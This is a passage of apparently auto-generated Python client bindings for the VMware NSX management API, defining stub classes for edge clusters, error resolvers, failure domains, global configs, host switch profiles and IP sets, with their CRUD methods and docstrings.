return self._invoke('list',
{
'compute_collection_id': compute_collection_id,
})
def update(self,
template_id,
compute_collection_transport_node_template,
):
"""
Update configuration of compute collection transportnode template.
Compute_collection_id isn't allowed to be changed since it represents
the association between ComputeCollection and this template. This is
determined when ComputeCollectionTransportNodeTemplate got created.
Note- transport node templates APIs are deprecated and user is
recommended to use transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:type compute_collection_transport_node_template: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:param compute_collection_transport_node_template: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:return: com.vmware.nsx.model.ComputeCollectionTransportNodeTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'template_id': template_id,
'compute_collection_transport_node_template': compute_collection_transport_node_template,
})
class EdgeClusters(VapiInterface):
    """
    Stub-backed client for the ``com.vmware.nsx.edge_clusters`` service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.edge_clusters'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _EdgeClustersStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               edge_cluster,
               ):
        """
        Create a new edge cluster. Only homogeneous members are supported:
        cluster members must be TransportNodes backed by EdgeNode. The
        DeploymentType (VIRTUAL_MACHINE|PHYSICAL_MACHINE) of these EdgeNodes
        is recommended to be the same, although EdgeCluster accepts members
        of different deployment types.

        :type  edge_cluster: :class:`com.vmware.nsx.model_client.EdgeCluster`
        :param edge_cluster: (required)
        :rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
        :return: com.vmware.nsx.model.EdgeCluster
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'edge_cluster': edge_cluster}
        return self._invoke('create', args)
    def delete(self,
               edge_cluster_id,
               ):
        """
        Delete the edge cluster with the given id.

        :type  edge_cluster_id: :class:`str`
        :param edge_cluster_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'edge_cluster_id': edge_cluster_id}
        return self._invoke('delete', args)
    def get(self,
            edge_cluster_id,
            ):
        """
        Fetch information about the edge cluster with the given id.

        :type  edge_cluster_id: :class:`str`
        :param edge_cluster_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
        :return: com.vmware.nsx.model.EdgeCluster
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'edge_cluster_id': edge_cluster_id}
        return self._invoke('get', args)
    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List the configured edge clusters. An edge cluster groups transport
        nodes of type EdgeNode so that fabric profiles can be applied to all
        of its members; each edge node can belong to at most one edge
        cluster.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.EdgeClusterListResult`
        :return: com.vmware.nsx.model.EdgeClusterListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
    def replacetransportnode(self,
                             edge_cluster_id,
                             edge_cluster_member_transport_node,
                             ):
        """
        Replace the transport node in the specified member of the
        edge-cluster. This is a disruptive action: every
        LogicalRouterPort (uplink and routerLink) hosted on the old
        transport_node is moved to the new transport_node. The transport node
        must not already be a member of any edge cluster.

        :type  edge_cluster_id: :class:`str`
        :param edge_cluster_id: (required)
        :type  edge_cluster_member_transport_node: :class:`com.vmware.nsx.model_client.EdgeClusterMemberTransportNode`
        :param edge_cluster_member_transport_node: (required)
        :rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
        :return: com.vmware.nsx.model.EdgeCluster
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'edge_cluster_id': edge_cluster_id,
            'edge_cluster_member_transport_node': edge_cluster_member_transport_node,
        }
        return self._invoke('replacetransportnode', args)
    def update(self,
               edge_cluster_id,
               edge_cluster,
               ):
        """
        Modify the specified edge cluster. Modifiable parameters include the
        description, display_name and transport-node-id. If the optional
        fabric_profile_binding is included, resource_type and profile_id are
        required. Callers should GET the edge-cluster, then send back the
        payload retaining the member_index of the existing members as
        returned by the GET. For newly added members the member_index cannot
        be chosen by the caller; the system-allocated index is visible in the
        response of this call or via a subsequent GET. This PUT cannot be
        used to replace the transport_node of an existing member — that is a
        disruptive action with its own explicit API, see
        \"ReplaceEdgeClusterMemberTransportNode\". EdgeCluster only supports
        homogeneous members: the TransportNodes backed by EdgeNode are only
        allowed in cluster members. DeploymentType
        (VIRTUAL_MACHINE|PHYSICAL_MACHINE) of these EdgeNodes is recommended
        to be the same, although EdgeCluster supports members of different
        deployment types.

        :type  edge_cluster_id: :class:`str`
        :param edge_cluster_id: (required)
        :type  edge_cluster: :class:`com.vmware.nsx.model_client.EdgeCluster`
        :param edge_cluster: (required)
        :rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
        :return: com.vmware.nsx.model.EdgeCluster
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'edge_cluster_id': edge_cluster_id,
            'edge_cluster': edge_cluster,
        }
        return self._invoke('update', args)
class ErrorResolver(VapiInterface):
    """
    Stub-backed client for the ``com.vmware.nsx.error_resolver`` service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.error_resolver'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ErrorResolverStub)
        self._VAPI_OPERATION_IDS = {}
    def get(self,
            error_id,
            ):
        """
        Fetch metadata about the given error_id, including whether a resolver
        is registered for it and its associated user input data.

        :type  error_id: :class:`str`
        :param error_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ErrorResolverInfo`
        :return: com.vmware.nsx.model.ErrorResolverInfo
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'error_id': error_id}
        return self._invoke('get', args)
    def list(self):
        """
        List metadata for every registered error resolver.

        :rtype: :class:`com.vmware.nsx.model_client.ErrorResolverInfoList`
        :return: com.vmware.nsx.model.ErrorResolverInfoList
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        return self._invoke('list', None)
    def resolveerror(self,
                     error_resolver_metadata_list,
                     ):
        """
        Invoke the corresponding error resolver for each error present in the
        payload.

        :type  error_resolver_metadata_list: :class:`com.vmware.nsx.model_client.ErrorResolverMetadataList`
        :param error_resolver_metadata_list: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'error_resolver_metadata_list': error_resolver_metadata_list}
        return self._invoke('resolveerror', args)
class FailureDomains(VapiInterface):
    """
    Stub-backed client for the ``com.vmware.nsx.failure_domains`` service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.failure_domains'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _FailureDomainsStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               failure_domain,
               ):
        """
        Create a new failure domain.

        :type  failure_domain: :class:`com.vmware.nsx.model_client.FailureDomain`
        :param failure_domain: (required)
        :rtype: :class:`com.vmware.nsx.model_client.FailureDomain`
        :return: com.vmware.nsx.model.FailureDomain
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'failure_domain': failure_domain}
        return self._invoke('create', args)
    def delete(self,
               failure_domain_id,
               ):
        """
        Delete an existing failure domain. The system-generated default
        failure domain cannot be deleted.

        :type  failure_domain_id: :class:`str`
        :param failure_domain_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'failure_domain_id': failure_domain_id}
        return self._invoke('delete', args)
    def get(self,
            failure_domain_id,
            ):
        """
        Fetch information about a single failure domain.

        :type  failure_domain_id: :class:`str`
        :param failure_domain_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.FailureDomain`
        :return: com.vmware.nsx.model.FailureDomain
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'failure_domain_id': failure_domain_id}
        return self._invoke('get', args)
    def list(self):
        """
        List the configured failure domains.

        :rtype: :class:`com.vmware.nsx.model_client.FailureDomainListResult`
        :return: com.vmware.nsx.model.FailureDomainListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        return self._invoke('list', None)
    def update(self,
               failure_domain_id,
               failure_domain,
               ):
        """
        Update an existing failure domain. Modifiable parameters are
        display_name and the preferred_active_edge_services flag.

        :type  failure_domain_id: :class:`str`
        :param failure_domain_id: (required)
        :type  failure_domain: :class:`com.vmware.nsx.model_client.FailureDomain`
        :param failure_domain: (required)
        :rtype: :class:`com.vmware.nsx.model_client.FailureDomain`
        :return: com.vmware.nsx.model.FailureDomain
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'failure_domain_id': failure_domain_id,
            'failure_domain': failure_domain,
        }
        return self._invoke('update', args)
class GlobalConfigs(VapiInterface):
    """
    Stub-backed client for the ``com.vmware.nsx.global_configs`` service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.global_configs'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _GlobalConfigsStub)
        self._VAPI_OPERATION_IDS = {}
    def get(self,
            config_type,
            ):
        """
        Fetch the global configurations that belong to the given config type.

        :type  config_type: :class:`str`
        :param config_type: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.GlobalConfigs
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.GlobalConfigs`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'config_type': config_type}
        return self._invoke('get', args)
    def list(self):
        """
        List the global configurations of an NSX domain grouped by config
        type. These global configurations apply across the NSX domain for
        their respective types unless overridden by a more granular
        configuration.

        :rtype: :class:`com.vmware.nsx.model_client.GlobalConfigsListResult`
        :return: com.vmware.nsx.model.GlobalConfigsListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        return self._invoke('list', None)
    def resyncconfig(self,
                     config_type,
                     global_configs,
                     ):
        """
        Like updating the global configurations, but triggers an update even
        when the configs are unmodified. Realization of the new configuration
        is config-type specific; refer to the config-type specific
        documentation for details about the configuration push state.

        :type  config_type: :class:`str`
        :param config_type: (required)
        :type  global_configs: :class:`vmware.vapi.struct.VapiStruct`
        :param global_configs: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.GlobalConfigs`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.GlobalConfigs
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.GlobalConfigs`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'config_type': config_type,
            'global_configs': global_configs,
        }
        return self._invoke('resyncconfig', args)
    def update(self,
               config_type,
               global_configs,
               ):
        """
        Update the global configurations for the given config type.

        :type  config_type: :class:`str`
        :param config_type: (required)
        :type  global_configs: :class:`vmware.vapi.struct.VapiStruct`
        :param global_configs: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.GlobalConfigs`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.GlobalConfigs
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.GlobalConfigs`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'config_type': config_type,
            'global_configs': global_configs,
        }
        return self._invoke('update', args)
class HostSwitchProfiles(VapiInterface):
    """
    Stub-backed client for the ``com.vmware.nsx.host_switch_profiles``
    service.
    """
    LIST_HOSTSWITCH_PROFILE_TYPE_UPLINKHOSTSWITCHPROFILE = "UplinkHostSwitchProfile"
    """
    Possible value for ``hostswitchProfileType`` of
    :func:`HostSwitchProfiles.list`.
    """
    LIST_HOSTSWITCH_PROFILE_TYPE_LLDPHOSTSWITCHPROFILE = "LldpHostSwitchProfile"
    """
    Possible value for ``hostswitchProfileType`` of
    :func:`HostSwitchProfiles.list`.
    """
    LIST_HOSTSWITCH_PROFILE_TYPE_NIOCPROFILE = "NiocProfile"
    """
    Possible value for ``hostswitchProfileType`` of
    :func:`HostSwitchProfiles.list`.
    """
    LIST_HOSTSWITCH_PROFILE_TYPE_EXTRACONFIGHOSTSWITCHPROFILE = "ExtraConfigHostSwitchProfile"
    """
    Possible value for ``hostswitchProfileType`` of
    :func:`HostSwitchProfiles.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.host_switch_profiles'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _HostSwitchProfilesStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               base_host_switch_profile,
               ):
        """
        Create a hostswitch profile. The resource_type is required. For
        uplink profiles, the teaming and policy parameters are required. By
        default the mtu is 1600 and the transport_vlan is 0. The supported
        MTU range is 1280 through (uplink_mtu_threshold), where
        (uplink_mtu_threshold) is 9000 by default; the range can be extended
        by raising (uplink_mtu_threshold) in SwitchingGlobalConfig.

        :type  base_host_switch_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param base_host_switch_profile: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.BaseHostSwitchProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'base_host_switch_profile': base_host_switch_profile}
        return self._invoke('create', args)
    def delete(self,
               host_switch_profile_id,
               ):
        """
        Delete the specified hostswitch profile.

        :type  host_switch_profile_id: :class:`str`
        :param host_switch_profile_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'host_switch_profile_id': host_switch_profile_id}
        return self._invoke('delete', args)
    def get(self,
            host_switch_profile_id,
            ):
        """
        Fetch information about the specified hostswitch profile.

        :type  host_switch_profile_id: :class:`str`
        :param host_switch_profile_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.BaseHostSwitchProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {'host_switch_profile_id': host_switch_profile_id}
        return self._invoke('get', args)
    def list(self,
             cursor=None,
             hostswitch_profile_type=None,
             include_system_owned=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             uplink_teaming_policy_name=None,
             ):
        """
        List the configured hostswitch profiles. Hostswitch profiles define
        networking policies for hostswitches (sometimes referred to as
        bridges in OVS). Currently only uplink teaming is supported; uplink
        teaming allows NSX to load balance traffic across different physical
        NICs (PNICs) on the hypervisor hosts. Multiple teaming policies are
        supported, including LACP active, LACP passive, load balancing based
        on source ID, and failover order.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied by current result page) (optional)
        :type  hostswitch_profile_type: :class:`str` or ``None``
        :param hostswitch_profile_type: Supported HostSwitch profiles. (optional)
        :type  include_system_owned: :class:`bool` or ``None``
        :param include_system_owned: Whether the list result contains system resources (optional, default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  uplink_teaming_policy_name: :class:`str` or ``None``
        :param uplink_teaming_policy_name: The host switch profile's uplink teaming policy name (optional)
        :rtype: :class:`com.vmware.nsx.model_client.HostSwitchProfilesListResult`
        :return: com.vmware.nsx.model.HostSwitchProfilesListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'cursor': cursor,
            'hostswitch_profile_type': hostswitch_profile_type,
            'include_system_owned': include_system_owned,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
            'uplink_teaming_policy_name': uplink_teaming_policy_name,
        }
        return self._invoke('list', args)
    def update(self,
               host_switch_profile_id,
               base_host_switch_profile,
               ):
        """
        Modify the specified hostswitch profile. The body of the PUT request
        must include the resource_type; for uplink profiles it must also
        include teaming parameters. Modifiable attributes include
        display_name, mtu, and transport_vlan. For uplink teaming policies,
        uplink_name and policy are also modifiable.

        :type  host_switch_profile_id: :class:`str`
        :param host_switch_profile_id: (required)
        :type  base_host_switch_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param base_host_switch_profile: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.BaseHostSwitchProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        args = {
            'host_switch_profile_id': host_switch_profile_id,
            'base_host_switch_profile': base_host_switch_profile,
        }
        return self._invoke('update', args)
class IpSets(VapiInterface):
    """
    API service for NSX IPSets — named groups of individual IP addresses,
    address ranges, or subnets (IPv4 or IPv6).
    """
    CREATE_0_ACTION_ADD_IP = "add_ip"
    """
    Possible value for ``action`` of method :func:`IpSets.create_0`.
    """
    CREATE_0_ACTION_REMOVE_IP = "remove_ip"
    """
    Possible value for ``action`` of method :func:`IpSets.create_0`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ip_sets'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used to construct the underlying stub.
        """
        VapiInterface.__init__(self, config, _IpSetsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, ip_set):
        """
        Create a new IPSet that can group either IPv4 or IPv6 individual
        addresses, ranges, or subnets.

        :type  ip_set: :class:`com.vmware.nsx.model_client.IPSet`
        :param ip_set: (required)
        :rtype: :class:`com.vmware.nsx.model_client.IPSet`
        :return: com.vmware.nsx.model.IPSet
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ip_set': ip_set}
        return self._invoke('create', args)

    def create_0(self, ip_set_id, ip_address_element, action):
        """
        Add or remove an individual IP address to/from an IPSet.

        :type  ip_set_id: :class:`str`
        :param ip_set_id: IP Set Id (required)
        :type  ip_address_element: :class:`com.vmware.nsx.model_client.IPAddressElement`
        :param ip_address_element: (required)
        :type  action: :class:`str`
        :param action: Specifies addition or removal action (required);
            see the ``CREATE_0_ACTION_*`` class constants.
        :rtype: :class:`com.vmware.nsx.model_client.IPAddressElement`
        :return: com.vmware.nsx.model.IPAddressElement
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'ip_set_id': ip_set_id,
            'ip_address_element': ip_address_element,
            'action': action,
        }
        return self._invoke('create_0', args)

    def delete(self, ip_set_id, force=None):
        """
        Delete the specified IPSet. By default an IPSet that is referenced
        by an NSGroup is not deleted; pass ``force=True`` to delete it
        anyway.

        :type  ip_set_id: :class:`str`
        :param ip_set_id: IPSet Id (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            ConcurrentChange, Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'ip_set_id': ip_set_id,
            'force': force,
        }
        return self._invoke('delete', args)

    def get(self, ip_set_id):
        """
        Return information about the specified IPSet.

        :type  ip_set_id: :class:`str`
